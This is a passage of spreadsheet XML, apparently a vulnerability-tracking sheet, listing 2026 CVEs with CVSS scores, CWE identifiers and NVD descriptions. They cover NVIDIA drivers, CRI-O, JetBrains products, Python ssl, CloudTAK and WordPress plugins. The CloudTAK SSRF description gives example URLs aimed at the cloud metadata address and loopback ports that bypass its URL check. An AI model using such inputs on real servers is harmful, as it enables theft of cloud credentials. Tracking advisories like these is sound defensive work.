          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user can write to read-only memory because the memory's permissions are not preserved. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47595</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47597</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the open-source kernel module Resource Server where an unprivileged local user could cause a use-after-free through a missing self-reference guard in the map cleanup path. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47597</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47599</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the open-source kernel module where an unprivileged local user could cause improper preservation of memory access permissions during DMA mapping. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47599</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47600</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an error-handling path could operate on an improperly initialized resource. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47600</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47601</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the open-source kernel module DMA-BUF import path where an unprivileged local user could cause improper preservation of memory access permissions when importing a read-only buffer from another device's DMA-BUF exporter. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47601</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53605</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-250, CWE-269</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Reachy Mini ISO for Wireless contains the necessary files to build a custom Raspberry Pi OS image for the Reachy Mini Wireless robot, using pi-gen. Prior to version 0.2.4, the Reachy Mini Wireless OS image shipped with an overly broad sudoers entry granting the pollen daemon user (uid 1000) passwordless sudo access to /usr/bin/systemctl with no subcommand or argument restriction. This is a local privilege escalation (LPE). Any process running as pollen can obtain full root (uid 0) on the device in three commands, with no additional vulnerability required and no user interaction. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53605</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62146</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-501</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>A trust-boundary flaw in CRI-O's sandbox state persistence allows attacker-influenced pod metadata to overwrite CRI-O's own reserved sandbox bookkeeping; once reloaded as trusted after a restart, a later container recreate in that sandbox can expose a host-side runtime-management resource inside the container, enabling container escape.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62146</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100266</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Hub before 2026.2.52366 missing authorisation allowed authenticated users to send arbitrary emails from the server's trusted address</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100266</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100268</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 project administrators could read comments from other projects via notification templates</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100268</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47576</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module through which an attacker might initiate an out-of-bounds read. Successful exploitation of this issue could lead to denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47576</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100262</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 missing authorisation allowed users with read-only project access to overwrite project notification templates</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100262</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19553</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>ssl.SSLContext.wrap_bio() didn't require the server_hostname argument
to not be None if ssl.SSLContext.check_hostname was set. Due to a
missing parameter check in SSLObject, if the server_hostname argument
isn't supplied then hostname verification would be silently skipped.
This defect could lead to programs where certificate hostname verification
*appeared* to be succeeding with SSLContext.check_hostname = True and no
ValueError being raised due to misconfiguration.
If the program passes a server_hostname value that isn't an empty string
or None to any of these APIs then certificate hostname verification
proceeds as expected and the program is not affected by this vulnerability.
Mitigating this vulnerability doesn't require updating Python or applying
the patch. To mitigate, pass a valid non-None and non-empty
server_hostname value to SSLContext.wrap_bio(),
asyncio.create_connection(), or asyncio.loop.start_tls() and
certificate hostname verification will proceed as expected. Upgrading to
the latest version of Python or applying the patch only changes the
behavior from silently skipping hostname verification to raising a
ValueError, similar to SSLContext.wrap_socket(), when server_hostname
isn't supplied.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19553</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55177</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>tempo, requests</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>CloudTAK is a browser-based Common Operating Picture and situational awareness tool compatible with TAK. Prior to version 13.10.0, every route in the ESRI helper family (api/routes/esri.ts) takes a fully attacker-controlled URL from the request (POST /api/esri body url, and the portal / server / layer query parameters on the GET /api/esri/* routes) and passes it into EsriBase / EsriProxyPortal / EsriProxyServer / EsriProxyLayer in api/lib/esri.ts, which fetch it with the bare fetch from @tak-ps/etl. No IP / DNS / hostname classification is applied at any point, so the destination is never validated against private, loopback, or link-local ranges. Any authenticated user (the routes only require Auth.is_auth(config, req, { anyResources: true }), i.e. any token, not an admin) can therefore make the CloudTAK server issue arbitrary outbound GET/POST requests to internal addresses such as the cloud instance-metadata service (169.254.169.254), loopback admin ports (127.0.0.1:&lt;port&gt;), and other hosts reachable only from inside the deployment VPC. This is a full-read SSRF, not blind: on success the upstream JSON body is returned to the caller via res.json(...), and on failure the upstream error string is reflected verbatim as ESRI Server Error: &lt;message&gt;. An attacker can read cloud metadata (and the temporary IAM credentials the instance role exposes), enumerate internal services, and exfiltrate their response bodies. The sniff() URL classifier provides no protection: it only pattern-matches the pathname (/rest, /arcgis/rest, /sharing/rest), so a URL like http://169.254.169.254/arcgis/rest or http://127.0.0.1:8500/rest passes sniff() and is fetched. This issue has been patched in version 13.10.0.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55177</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62085</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WP Activity Log &lt;= 5.6.6 versions.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62085</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62097</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPTasty Business Directory business-directory-plugin allows Blind SQL Injection.This issue affects Business Directory: from n/a through 6.4.27.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62097</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94082</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Author SQL Injection in Quiz Cat &lt;= 3.1.1 versions.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94082</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96345</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
